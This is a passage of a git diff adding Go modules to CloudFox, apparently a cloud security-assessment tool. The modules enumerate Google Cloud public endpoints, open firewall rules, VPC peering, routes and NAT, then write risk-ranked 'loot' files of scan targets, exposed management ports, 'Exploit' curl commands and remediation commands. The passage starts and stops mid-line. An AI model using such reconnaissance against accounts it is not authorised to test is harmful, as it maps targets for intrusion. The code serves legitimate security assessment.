runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing Cloud Run services: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + } + return + } + + for _, service := range resp.Items { + // Check if service is publicly accessible + isPublic := false + if service.Spec != nil && service.Spec.Template != nil { + // Check IAM policy or ingress settings + // For simplicity, we check if the service has a URL + if service.Status != nil && service.Status.Url != "" { + isPublic = true + } + } + + if isPublic && service.Status != nil && service.Status.Url != "" { + exposed := ExposedResource{ + ResourceType: "cloud_run", + ResourceName: service.Metadata.Name, + ProjectID: projectID, + FQDN: service.Status.Url, + ExposedPorts: []string{"443"}, + Protocol: "HTTPS", + TLSEnabled: true, + } + + // Get service account + if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { + exposed.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName + } + + // Determine risk level + exposed.RiskLevel = "MEDIUM" + exposed.RiskReasons = []string{"Public Cloud Run service"} + + // Check for allUsers invoker + // This would require checking IAM policy + exposed.ExploitCommand = fmt.Sprintf("curl -v %s", service.Status.Url) + + m.mu.Lock() + m.ExposedResources = append(m.ExposedResources, exposed) + m.addExposedResourceToLoot(exposed) + m.mu.Unlock() + } + } +} + +// analyzeFirewallExposure analyzes firewall rules for public exposure +func (m *NetworkExposureModule) analyzeFirewallExposure(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Firewalls.List(projectID) + err = req.Pages(ctx, func(page *compute.FirewallList) error { + for _, fw := range page.Items { + // Check if rule allows ingress from 0.0.0.0/0 + isPublic := false + for _, sr := range fw.SourceRanges { + if sr == "0.0.0.0/0" { + isPublic = true + break + } + } + + if isPublic && fw.Direction == "INGRESS" { + exposure := FirewallExposure{ + RuleName: fw.Name, + ProjectID: projectID, + Network: fw.Network, + Direction: fw.Direction, + SourceRanges: fw.SourceRanges, + TargetTags: fw.TargetTags, + IsPublic: true, + } + + // Get allowed ports + for _, allowed := range fw.Allowed { + exposure.Protocol = allowed.IPProtocol + for _, port := range allowed.Ports { + exposure.Ports = append(exposure.Ports, port) + } + } + + // Determine risk level + exposure.RiskLevel, exposure.RiskReasons = m.classifyFirewallRisk(exposure) + + m.mu.Lock() + m.FirewallExposures = append(m.FirewallExposures, exposure) + m.addFirewallExposureToLoot(exposure) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing firewall rules: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + } +} + +// classifyInstanceRisk determines the risk level of an exposed instance +func (m *NetworkExposureModule) classifyInstanceRisk(instance *compute.Instance) (string, []string) { + var reasons []string + score := 0 + + // Check for default service account + for _, sa := range instance.ServiceAccounts { + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine SA") + score += 2 + } + + // Check for broad scopes + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + reasons = append(reasons, "Has cloud-platform scope (full access)") + score += 3 + } + } + } + + // External IP is always a risk + reasons = append(reasons, "Has external IP") + score += 1 + + if score >= 4 { + return "CRITICAL", reasons + } else if score >= 2 { + return "HIGH", reasons + } + return "MEDIUM", reasons +} + +// classifyFirewallRisk determines the risk level of a firewall exposure +func (m *NetworkExposureModule) classifyFirewallRisk(exposure FirewallExposure) (string, []string) { + var reasons []string + score := 0 + + // Check for dangerous ports + dangerousPorts := map[string]string{ + "22": "SSH", + "3389": "RDP", + "3306": "MySQL", + "5432": "PostgreSQL", + "27017": "MongoDB", + "6379": "Redis", + "9200": "Elasticsearch", + "8080": "HTTP Alt", + } + + for _, port := range exposure.Ports { + if name, ok := dangerousPorts[port]; ok { + reasons = append(reasons, fmt.Sprintf("Exposes %s (port %s)", name, port)) + score += 3 + } + } + + // Check for wide port ranges + for _, port := range exposure.Ports { + if strings.Contains(port, "-") { + reasons = append(reasons, fmt.Sprintf("Wide port range: %s", port)) + score += 2 + } + } + + // Check for no target tags (applies to all instances) + if len(exposure.TargetTags) == 0 { + reasons = append(reasons, "No target tags (applies to all instances)") + score += 2 + } + + // 0.0.0.0/0 is always a risk + reasons = append(reasons, "Allows traffic from 0.0.0.0/0") + score += 1 + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } + return "MEDIUM", reasons +} + +// generateSummaries creates exposure summaries by resource type +func (m *NetworkExposureModule) generateSummaries() { + typeCount := make(map[string]*ExposureSummary) + + for _, r := range m.ExposedResources { + if _, exists := typeCount[r.ResourceType]; !exists { + typeCount[r.ResourceType] = &ExposureSummary{ + ResourceType: r.ResourceType, + } + } + typeCount[r.ResourceType].Count++ + if r.RiskLevel == "CRITICAL" { + typeCount[r.ResourceType].CriticalCount++ + } else if r.RiskLevel == "HIGH" { + typeCount[r.ResourceType].HighCount++ + } + } + + for _, summary := range typeCount { + m.Summaries = append(m.Summaries, *summary) + } + + // Sort by count + sort.Slice(m.Summaries, func(i, j int) bool { + return m.Summaries[i].Count > m.Summaries[j].Count + }) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *NetworkExposureModule) initializeLootFiles() { + m.LootMap["exposure-critical"] = &internal.LootFile{ + Name: "exposure-critical", + Contents: "# Critical Network Exposures\n# Generated by CloudFox\n# These require immediate attention!\n\n", + } + m.LootMap["exposure-management-ports"] = &internal.LootFile{ + Name: "exposure-management-ports", + Contents: "# Exposed Management Ports\n# Generated by CloudFox\n# SSH, RDP, Database ports exposed to internet\n\n", + } + m.LootMap["exposure-scan-targets"] = &internal.LootFile{ + Name: "exposure-scan-targets", + Contents: "# Scan Targets\n# Generated by CloudFox\n# Use for authorized penetration testing\n\n", + } + m.LootMap["exposure-remediation"] = &internal.LootFile{ + Name: "exposure-remediation", + Contents: "# Remediation Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *NetworkExposureModule) addExposedResourceToLoot(resource ExposedResource) { + // Critical exposures + if resource.RiskLevel == "CRITICAL" { + m.LootMap["exposure-critical"].Contents += fmt.Sprintf( + "## %s: %s\n"+ + "Project: %s\n"+ + "IP/FQDN: %s%s\n"+ + "Risk Reasons:\n", + resource.ResourceType, + resource.ResourceName, + resource.ProjectID, + resource.ExternalIP, + resource.FQDN, + ) + for _, reason := range resource.RiskReasons { + m.LootMap["exposure-critical"].Contents += fmt.Sprintf(" - %s\n", reason) + } + m.LootMap["exposure-critical"].Contents += fmt.Sprintf("Exploit: %s\n\n", resource.ExploitCommand) + } + + // Scan targets + target := resource.ExternalIP + if target == "" { + target = resource.FQDN + } + if target != "" { + m.LootMap["exposure-scan-targets"].Contents += fmt.Sprintf( + "%s # %s (%s)\n", + target, + resource.ResourceName, + resource.ResourceType, + ) + } +} + +func (m *NetworkExposureModule) addFirewallExposureToLoot(exposure FirewallExposure) { + // Management ports + dangerousPorts := []string{"22", "3389", "3306", "5432", "27017", "6379"} + for _, port := range exposure.Ports { + for _, dp := range dangerousPorts { + if port == dp || strings.HasPrefix(port, dp+"-") { + m.LootMap["exposure-management-ports"].Contents += fmt.Sprintf( + "## Firewall Rule: %s\n"+ + "Project: %s\n"+ + "Port: %s\n"+ + "Source: %s\n"+ + "Risk: %s\n\n", + exposure.RuleName, + exposure.ProjectID, + port, + strings.Join(exposure.SourceRanges, ", "), + exposure.RiskLevel, + ) + break + } + } + } + + // Remediation + if exposure.RiskLevel == "CRITICAL" || exposure.RiskLevel == "HIGH" { + m.LootMap["exposure-remediation"].Contents += fmt.Sprintf( + "# Fix firewall rule: %s\n"+ + "gcloud compute firewall-rules update %s --source-ranges= --project=%s\n"+ + "# Or delete if unnecessary:\n"+ + "# gcloud compute firewall-rules delete %s --project=%s\n\n", + exposure.RuleName, + exposure.RuleName, + exposure.ProjectID, + exposure.RuleName, + exposure.ProjectID, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *NetworkExposureModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort resources by risk level + sort.Slice(m.ExposedResources, func(i, j int) bool { + riskOrder := map[string]int{"CRITICAL": 4, "HIGH": 3, "MEDIUM": 2, "LOW": 1} + return riskOrder[m.ExposedResources[i].RiskLevel] > riskOrder[m.ExposedResources[j].RiskLevel] + }) + + // Exposed resources table + resourcesHeader := []string{ + "Type", + "Name", + "Project", + "IP/FQDN", + "Ports", + "TLS", + "Risk", + } + + var resourcesBody [][]string + for _, r := range m.ExposedResources { + endpoint := r.ExternalIP + if endpoint == "" { + endpoint = r.FQDN + } + tls := "No" + if r.TLSEnabled { + tls = "Yes" + } + resourcesBody = append(resourcesBody, []string{ + r.ResourceType, + r.ResourceName, + r.ProjectID, + truncateString(endpoint, 40), + strings.Join(r.ExposedPorts, ","), + tls, + r.RiskLevel, + }) + } + + // Firewall exposures table + firewallHeader := []string{ + "Rule", + "Project", + "Ports", + "Protocol", + "Target Tags", + "Risk", + } + + var firewallBody [][]string + for _, f := range m.FirewallExposures { + firewallBody = append(firewallBody, []string{ + f.RuleName, + f.ProjectID, + strings.Join(f.Ports, ","), + f.Protocol, + strings.Join(f.TargetTags, ","), + f.RiskLevel, + }) + } + + // Summary table + summaryHeader := []string{ + "Resource Type", + "Total", + "Critical", + "High", + } + + var summaryBody [][]string + for _, s := range m.Summaries { + summaryBody = append(summaryBody, []string{ + s.ResourceType, + fmt.Sprintf("%d", s.Count), + fmt.Sprintf("%d", s.CriticalCount), + fmt.Sprintf("%d", s.HighCount), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(resourcesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "exposure-resources", + Header: resourcesHeader, + Body: resourcesBody, + }) + } + + if len(firewallBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "exposure-firewall", + Header: firewallHeader, + Body: firewallBody, + }) + } + + if len(summaryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "exposure-summary", + Header: summaryHeader, + Body: summaryBody, + }) + } + + output := NetworkExposureOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go new file mode 100644 index 00000000..6f65c42c --- /dev/null +++ b/gcp/commands/networktopology.go @@ -0,0 +1,953 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" +) + +// Module name constant +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +var GCPNetworkTopologyCommand = &cobra.Command{ + Use: GCP_NETWORKTOPOLOGY_MODULE_NAME, + Aliases: []string{"topology", "network-map", "vpc-topology"}, + Short: "Visualize VPC network topology, peering relationships, and trust boundaries", + Long: `Analyze and visualize VPC network topology, peering relationships, and trust boundaries. + +Features: +- Maps all VPC networks and their subnets +- Identifies VPC peering relationships +- Detects Shared VPC configurations +- Analyzes VPC Service Controls perimeters +- Maps Cloud NAT and Private Google Access +- Identifies potential trust boundary issues +- Detects cross-project network access paths + +Requires appropriate IAM permissions: +- roles/compute.networkViewer +- roles/compute.viewer`, + Run: runGCPNetworkTopologyCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type VPCNetwork struct { + Name string + ProjectID string + SelfLink string + Description string + RoutingMode string + AutoCreateSubnets bool + SubnetCount int + PeeringCount int + IsSharedVPC bool + SharedVPCRole string // "host" or "service" + SharedVPCHost string + MTU int64 + CreationTimestamp string + FirewallRuleCount int + PrivateGoogleAcces bool +} + +type Subnet struct { + Name string + ProjectID string + Network string + Region string + IPCIDRRange string + SecondaryRanges []string + PrivateIPGoogleAccess bool + FlowLogsEnabled bool + Purpose string + Role string + StackType string +} + +type VPCPeering struct { + Name string + Network string + PeerNetwork string + State string + StateDetails string + ExportCustomRoute bool + ImportCustomRoute bool + ExportSubnetRoute bool + ImportSubnetRoute bool + ProjectID string + PeerProjectID string + AutoCreateRoutes bool +} + +type SharedVPCConfig struct { + HostProject string + ServiceProjects []string + SharedSubnets []string + SharedNetworks []string +} + +type CloudNATConfig struct { + Name string + ProjectID string + Region string + Network string + Subnets []string + NATIPAddresses []string + MinPortsPerVM int64 + SourceSubnetworkType string + EnableLogging bool +} + +type TrustBoundary struct { + Name string + Type string // "vpc-peering", "shared-vpc", "service-perimeter" + SourceScope string + TargetScope string + RiskLevel string + Details string +} + +type NetworkRoute struct { + Name string + ProjectID string + Network string + DestRange string + NextHop string + NextHopType string + Priority int64 + Tags []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type NetworkTopologyModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Networks []VPCNetwork + Subnets []Subnet + Peerings []VPCPeering + SharedVPCs map[string]*SharedVPCConfig + NATs []CloudNATConfig + TrustBoundarie []TrustBoundary + Routes []NetworkRoute + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type NetworkTopologyOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NetworkTopologyOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NetworkTopologyOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_NETWORKTOPOLOGY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &NetworkTopologyModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []VPCNetwork{}, + Subnets: []Subnet{}, + Peerings: []VPCPeering{}, + SharedVPCs: make(map[string]*SharedVPCConfig), + NATs: []CloudNATConfig{}, + TrustBoundarie: []TrustBoundary{}, + Routes: []NetworkRoute{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Mapping network topology and trust boundaries...", GCP_NETWORKTOPOLOGY_MODULE_NAME) + + // Create Compute client + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, logger) + }(projectID) + } + wg.Wait() + + // Analyze trust boundaries + m.analyzeTrustBoundaries(logger) + + // Check results + if len(m.Networks) == 0 { + logger.InfoM("No VPC networks found", GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Mapped %d VPC network(s), %d subnet(s), %d peering(s)", + len(m.Networks), len(m.Subnets), len(m.Peerings)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + + if len(m.TrustBoundarie) > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d trust boundary relationship(s)", len(m.TrustBoundarie)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *NetworkTopologyModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks for project: %s", projectID), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + + // List networks + m.enumerateNetworks(ctx, projectID, computeService, logger) + + // List subnets + m.enumerateSubnets(ctx, projectID, computeService, logger) + + // List routes + m.enumerateRoutes(ctx, projectID, computeService, logger) + + // List Cloud NAT + m.enumerateCloudNAT(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Networks.List(projectID) + err := req.Pages(ctx, func(page *compute.NetworkList) error { + for _, network := range page.Items { + vpc := VPCNetwork{ + Name: network.Name, + ProjectID: projectID, + SelfLink: network.SelfLink, + Description: network.Description, + RoutingMode: network.RoutingConfig.RoutingMode, + AutoCreateSubnets: network.AutoCreateSubnetworks, + MTU: network.Mtu, + CreationTimestamp: network.CreationTimestamp, + SubnetCount: len(network.Subnetworks), + } + + // Check for peerings + for _, peering := range network.Peerings { + vpc.PeeringCount++ + + peeringRecord := VPCPeering{ + Name: peering.Name, + Network: network.SelfLink, + PeerNetwork: peering.Network, + State: peering.State, + StateDetails: peering.StateDetails, + ExportCustomRoute: peering.ExportCustomRoutes, + ImportCustomRoute: peering.ImportCustomRoutes, + ExportSubnetRoute: peering.ExportSubnetRoutesWithPublicIp, + ImportSubnetRoute: peering.ImportSubnetRoutesWithPublicIp, + ProjectID: projectID, + AutoCreateRoutes: peering.AutoCreateRoutes, + } + + // Extract peer project ID from peer network URL + peeringRecord.PeerProjectID = m.extractProjectFromURL(peering.Network) + + m.mu.Lock() + m.Peerings = append(m.Peerings, peeringRecord) + m.mu.Unlock() + } + + m.mu.Lock() + m.Networks = append(m.Networks, vpc) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing networks for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + } + + // Check for Shared VPC host project + m.checkSharedVPCHost(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Subnetworks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnetList := range page.Items { + if subnetList.Subnetworks == nil { + continue + } + for _, subnet := range subnetList.Subnetworks { + subnetRecord := Subnet{ + Name: subnet.Name, + ProjectID: projectID, + Network: subnet.Network, + Region: m.extractRegionFromURL(region), + IPCIDRRange: subnet.IpCidrRange, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + Role: subnet.Role, + StackType: subnet.StackType, + } + + // Check for flow logs + if subnet.LogConfig != nil { + subnetRecord.FlowLogsEnabled = subnet.LogConfig.Enable + } + + // Secondary ranges + for _, sr := range subnet.SecondaryIpRanges { + subnetRecord.SecondaryRanges = append(subnetRecord.SecondaryRanges, + fmt.Sprintf("%s:%s", sr.RangeName, sr.IpCidrRange)) + } + + m.mu.Lock() + m.Subnets = append(m.Subnets, subnetRecord) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing subnets for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + } +} + +func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Routes.List(projectID) + err := req.Pages(ctx, func(page *compute.RouteList) error { + for _, route := range page.Items { + routeRecord := NetworkRoute{ + Name: route.Name, + ProjectID: projectID, + Network: route.Network, + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + } + + // Determine next hop type + switch { + case route.NextHopGateway != "": + routeRecord.NextHopType = "gateway" + routeRecord.NextHop = route.NextHopGateway + case route.NextHopInstance != "": + routeRecord.NextHopType = "instance" + routeRecord.NextHop = route.NextHopInstance + case route.NextHopIp != "": + routeRecord.NextHopType = "ip" + routeRecord.NextHop = route.NextHopIp + case route.NextHopNetwork != "": + routeRecord.NextHopType = "network" + routeRecord.NextHop = route.NextHopNetwork + case route.NextHopPeering != "": + routeRecord.NextHopType = "peering" + routeRecord.NextHop = route.NextHopPeering + case route.NextHopIlb != "": + routeRecord.NextHopType = "ilb" + routeRecord.NextHop = route.NextHopIlb + case route.NextHopVpnTunnel != "": + routeRecord.NextHopType = "vpn" + routeRecord.NextHop = route.NextHopVpnTunnel + } + + m.mu.Lock() + m.Routes = append(m.Routes, routeRecord) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing routes for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + } +} + +func (m *NetworkTopologyModule) enumerateCloudNAT(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // List routers to find NAT configurations + req := computeService.Routers.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + for region, routerList := range page.Items { + if routerList.Routers == nil { + continue + } + for _, router := range routerList.Routers { + for _, nat := range router.Nats { + natRecord := CloudNATConfig{ + Name: nat.Name, + ProjectID: projectID, + Region: m.extractRegionFromURL(region), + Network: router.Network, + MinPortsPerVM: nat.MinPortsPerVm, + SourceSubnetworkType: nat.SourceSubnetworkIpRangesToNat, + } + + // NAT IP addresses + for _, natIP := range nat.NatIps { + natRecord.NATIPAddresses = append(natRecord.NATIPAddresses, natIP) + } + + // Subnets using this NAT + for _, subnet := range nat.Subnetworks { + natRecord.Subnets = append(natRecord.Subnets, subnet.Name) + } + + // Logging + if nat.LogConfig != nil { + natRecord.EnableLogging = nat.LogConfig.Enable + } + + m.mu.Lock() + m.NATs = append(m.NATs, natRecord) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing Cloud NAT for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + } +} + +func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Check if project is a Shared VPC host + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return + } + + if project.XpnProjectStatus == "HOST" { + m.mu.Lock() + m.SharedVPCs[projectID] = &SharedVPCConfig{ + HostProject: projectID, + ServiceProjects: []string{}, + SharedSubnets: []string{}, + SharedNetworks: []string{}, + } + m.mu.Unlock() + + // List service projects + xpnReq := computeService.Projects.GetXpnResources(projectID) + err := xpnReq.Pages(ctx, func(page *compute.ProjectsGetXpnResources) error { + for _, resource := range page.Resources { + if resource.Type == "PROJECT" { + m.mu.Lock() + m.SharedVPCs[projectID].ServiceProjects = append( + m.SharedVPCs[projectID].ServiceProjects, resource.Id) + m.mu.Unlock() + } + } + return nil + }) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing XPN resources for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + } + + // Mark host networks + for i := range m.Networks { + if m.Networks[i].ProjectID == projectID { + m.Networks[i].IsSharedVPC = true + m.Networks[i].SharedVPCRole = "host" + } + } + } +} + +// ------------------------------ +// Trust Boundary Analysis +// ------------------------------ +func (m *NetworkTopologyModule) analyzeTrustBoundaries(logger internal.Logger) { + // Analyze VPC peering trust boundaries + for _, peering := range m.Peerings { + boundary := TrustBoundary{ + Name: peering.Name, + Type: "vpc-peering", + SourceScope: fmt.Sprintf("projects/%s/networks/%s", peering.ProjectID, m.extractNetworkName(peering.Network)), + TargetScope: peering.PeerNetwork, + } + + // Assess risk level + if peering.ProjectID != peering.PeerProjectID { + boundary.RiskLevel = "HIGH" + boundary.Details = "Cross-project VPC peering enables network connectivity between different projects" + } else { + boundary.RiskLevel = "MEDIUM" + boundary.Details = "Same-project VPC peering enables connectivity between networks" + } + + // Check route sharing + if peering.ExportCustomRoute || peering.ImportCustomRoute { + boundary.Details += "; Custom routes are shared" + } + + m.mu.Lock() + m.TrustBoundarie = append(m.TrustBoundarie, boundary) + m.mu.Unlock() + + // Add to loot + m.addTrustBoundaryToLoot(boundary) + } + + // Analyze Shared VPC trust boundaries + for hostProject, config := range m.SharedVPCs { + for _, serviceProject := range config.ServiceProjects { + boundary := TrustBoundary{ + Name: fmt.Sprintf("shared-vpc-%s-%s", hostProject, serviceProject), + Type: "shared-vpc", + SourceScope: fmt.Sprintf("projects/%s", hostProject), + TargetScope: fmt.Sprintf("projects/%s", serviceProject), + RiskLevel: "MEDIUM", + Details: fmt.Sprintf("Shared VPC: %s provides network resources to %s", hostProject, serviceProject), + } + + m.mu.Lock() + m.TrustBoundarie = append(m.TrustBoundarie, boundary) + m.mu.Unlock() + + m.addTrustBoundaryToLoot(boundary) + } + } + + // Analyze routes for potential trust issues + for _, route := range m.Routes { + if route.NextHopType == "vpn" || route.NextHopType == "peering" { + boundary := TrustBoundary{ + Name: route.Name, + Type: "network-route", + SourceScope: route.Network, + TargetScope: route.NextHop, + RiskLevel: "LOW", + Details: fmt.Sprintf("Route to %s via %s", route.DestRange, route.NextHopType), + } + + // Elevated risk for default route (0.0.0.0/0) going through external paths + if route.DestRange == "0.0.0.0/0" && (route.NextHopType == "vpn" || route.NextHopType == "peering") { + boundary.RiskLevel = "HIGH" + boundary.Details = fmt.Sprintf("Default route (%s) via %s - all internet traffic routes through external path", + route.DestRange, route.NextHopType) + } + + m.mu.Lock() + m.TrustBoundarie = append(m.TrustBoundarie, boundary) + m.mu.Unlock() + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *NetworkTopologyModule) extractProjectFromURL(url string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + if strings.Contains(url, "projects/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *NetworkTopologyModule) extractNetworkName(url string) string { + // Extract network name from full URL + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *NetworkTopologyModule) extractRegionFromURL(url string) string { + // Extract region from URL like regions/us-central1 + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *NetworkTopologyModule) initializeLootFiles() { + m.LootMap["network-topology"] = &internal.LootFile{ + Name: "network-topology", + Contents: "# Network Topology Map\n# Generated by CloudFox\n\n", + } + m.LootMap["peering-analysis"] = &internal.LootFile{ + Name: "peering-analysis", + Contents: "# VPC Peering Analysis\n# Generated by CloudFox\n\n", + } + m.LootMap["shared-vpc-commands"] = &internal.LootFile{ + Name: "shared-vpc-commands", + Contents: "# Shared VPC Analysis Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["trust-boundaries"] = &internal.LootFile{ + Name: "trust-boundaries", + Contents: "# Trust Boundary Analysis\n# Generated by CloudFox\n\n", + } + m.LootMap["nat-analysis"] = &internal.LootFile{ + Name: "nat-analysis", + Contents: "# Cloud NAT Configuration Analysis\n# Generated by CloudFox\n\n", + } +} + +func (m *NetworkTopologyModule) addTrustBoundaryToLoot(boundary TrustBoundary) { + m.mu.Lock() + defer m.mu.Unlock() + + m.LootMap["trust-boundaries"].Contents += fmt.Sprintf( + "## %s (%s)\n"+ + "Type: %s\n"+ + "Source: %s\n"+ + "Target: %s\n"+ + "Risk Level: %s\n"+ + "Details: %s\n\n", + boundary.Name, + boundary.RiskLevel, + boundary.Type, + boundary.SourceScope, + boundary.TargetScope, + boundary.RiskLevel, + boundary.Details, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort networks by project and name + sort.Slice(m.Networks, func(i, j int) bool { + if m.Networks[i].ProjectID != m.Networks[j].ProjectID { + return m.Networks[i].ProjectID < m.Networks[j].ProjectID + } + return m.Networks[i].Name < m.Networks[j].Name + }) + + // VPC Networks table + networksHeader := []string{ + "Network", + "Project", + "Routing Mode", + "Subnets", + "Peerings", + "Shared VPC", + "MTU", + } + + var networksBody [][]string + for _, n := range m.Networks { + sharedVPC := "-" + if n.IsSharedVPC { + sharedVPC = n.SharedVPCRole + } + + networksBody = append(networksBody, []string{ + n.Name, + n.ProjectID, + n.RoutingMode, + fmt.Sprintf("%d", n.SubnetCount), + fmt.Sprintf("%d", n.PeeringCount), + sharedVPC, + fmt.Sprintf("%d", n.MTU), + }) + + // Add to topology loot + m.LootMap["network-topology"].Contents += fmt.Sprintf( + "## VPC: %s (%s)\n"+ + "Routing Mode: %s\n"+ + "Subnets: %d\n"+ + "Peerings: %d\n"+ + "Shared VPC: %s\n\n", + n.Name, n.ProjectID, + n.RoutingMode, + n.SubnetCount, + n.PeeringCount, + sharedVPC, + ) + } + + // Subnets table + subnetsHeader := []string{ + "Subnet", + "Network", + "Region", + "CIDR", + "Private Google 